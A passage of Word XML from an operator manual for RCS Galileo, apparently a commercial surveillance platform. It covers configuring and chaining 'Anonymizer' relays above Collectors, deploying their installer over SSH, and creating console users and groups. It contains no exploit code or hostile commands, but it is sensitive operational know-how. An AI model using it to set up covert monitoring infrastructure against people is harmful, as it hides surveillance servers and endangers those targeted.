          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00947612">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00947612">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00A01F54">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Anonymizer’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00A01F54">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00A01F54">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a not mandatory field to be used for storing additional information about the Anonymizer.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00A01F54">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00A01F54">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Address</w:t>
            </w:r>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the public IP address of the Anonymizer.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00A01F54">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00A01F54">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the communication port on which the Anonymizer is listening (443 is the default port).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00A01F54">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00A01F54" w:rsidP="00A01F54">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Monitor via network Controller</w:t>
            </w:r>
            <w:r w:rsidRPr="005361EF">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] if selected, the Anonymizer connectivity will be verified in the Monitor section.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A01F54" w:rsidRDefault="00A01F54" w:rsidP="00A01F54">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF6281" w:rsidRPr="005361EF" w:rsidRDefault="00EF6281" w:rsidP="00A01F54">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01F54" w:rsidRPr="005361EF" w:rsidRDefault="00EF6281" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To operate properly, RCS Galileo requires that at least 1 Anonymizer is connected above each Collector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E184E" w:rsidRDefault="002E184E" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E184E" w:rsidRPr="005361EF" w:rsidRDefault="002E184E" w:rsidP="002E184E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005361EF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BFF7318" wp14:editId="01EF3298">
            <wp:extent cx="3152775" cy="2379594"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>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400" cy="2398935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082626E" w:rsidRDefault="002E184E" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>As soon as a new Anonymizer is created, the System Administrator can find a new icon located at the top of the Console.</w:t>
      </w:r>
      <w:r w:rsidR="00947612">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> To activate a new Anonymizer, just drag it to the required position (on a Collector or another Anonymizer) and release it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E184E" w:rsidRDefault="002E184E" w:rsidP="007113E8">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6379"/>
        <w:gridCol w:w="1553"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E512A6" w:rsidTr="00423168">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E512A6" w:rsidRDefault="00E512A6" w:rsidP="00E17308">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6379" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001676B5" w:rsidRDefault="001676B5" w:rsidP="001676B5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E512A6" w:rsidRPr="00E512A6" w:rsidRDefault="002A7C6F" w:rsidP="001676B5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="8550" w:dyaOrig="7470">
                <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:307.5pt;height:269.25pt" o:ole="">
                  <v:imagedata r:id="rId21" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1446455240" r:id="rId22"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="002A7C6F" w:rsidRDefault="002A7C6F" w:rsidP="001676B5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002A7C6F" w:rsidRPr="002A7C6F" w:rsidRDefault="002A7C6F" w:rsidP="001676B5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E512A6" w:rsidRDefault="00E512A6" w:rsidP="001676B5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1.5 [ RCS Console ] </w:t>
            </w:r>
            <w:r w:rsidRPr="00E512A6">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Anonymizer Drag &amp; Drop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1553" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E512A6" w:rsidRDefault="00E512A6" w:rsidP="00E17308">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E512A6" w:rsidRDefault="00E512A6" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00423168" w:rsidRDefault="00423168" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E512A6" w:rsidRDefault="00A95FA9" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once the new Anonymizer has been attached within the Frontend chain, click on it (focus) and press the button Download installer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A2D9E" w:rsidRDefault="001A2D9E" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001676B5" w:rsidRDefault="00DB05AC" w:rsidP="00DB05AC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="942975" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>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523875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95FA9" w:rsidRDefault="00A95FA9" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D38AD" w:rsidRDefault="002D38AD" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1C51" w:rsidRDefault="004C1C51" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The file inside the .ZIP archive generated by </w:t>
      </w:r>
      <w:r w:rsidR="00017EFC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RCS Console, must be transferred through an SSH connection on the </w:t>
      </w:r>
      <w:r w:rsidR="002A7C6F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">previously dragged </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anonymizer and started.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95FA9" w:rsidRDefault="00A95FA9" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A2D9E" w:rsidRDefault="001A2D9E" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A2D9E" w:rsidRPr="001A2D9E" w:rsidRDefault="001A2D9E" w:rsidP="001A2D9E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="001A2D9E" w:rsidRPr="001A2D9E" w:rsidSect="00CE07E2">
          <w:headerReference w:type="default" r:id="rId24"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C553D6" w:rsidRDefault="00F359AE" w:rsidP="00C553D6">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc372642479"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Accounting and Operations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="0087756C" w:rsidP="00A719CD">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc372642480"/>
      <w:r>
        <w:t>Users, Groups and Advanced Permission</w:t>
      </w:r>
      <w:r w:rsidR="008206D2">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="0087756C" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="00971FFE" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The first activity to manage once entered the RCS Console is </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sers and </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>roups creation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971FFE" w:rsidRDefault="00971FFE" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00971FFE" w:rsidRDefault="00971FFE" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ser is a person authorized to access the system and needs to be associated with a number of different roles which can vary from 1 to 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A7DE8" w:rsidRDefault="008A7DE8" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-20" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5397"/>
        <w:gridCol w:w="288"/>
        <w:gridCol w:w="3943"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A7DE8" w:rsidTr="00F359AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5397" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002175DC" w:rsidRDefault="003A4380" w:rsidP="00C6266F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1076" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:254.9pt;height:407.55pt;z-index:251704320;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId25" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1076" DrawAspect="Content" ObjectID="_1446455336" r:id="rId26"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C6266F" w:rsidRPr="0098176A" w:rsidRDefault="0010013A" w:rsidP="00C6266F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
            <w:r w:rsidR="002175DC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="002175DC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Console ] Accounting &gt; Users</w:t>
            </w:r>
            <w:r w:rsidR="002175DC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; New User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="008A7DE8" w:rsidRDefault="008A7DE8" w:rsidP="0087756C">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3943" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D560FB" w:rsidRPr="00F359AE" w:rsidRDefault="00D560FB" w:rsidP="00CE0A58">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D560FB" w:rsidRPr="00F359AE" w:rsidRDefault="00D560FB" w:rsidP="00CE0A58">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008A7DE8" w:rsidRPr="00F359AE" w:rsidRDefault="00971FFE" w:rsidP="00CE0A58">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allow</w:t>
            </w:r>
            <w:r w:rsidR="00D86157" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to specify if a </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ser is active or not. If a user is not enabled it will be not possible to access the system.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00971FFE" w:rsidRPr="00F359AE" w:rsidRDefault="00971FFE" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
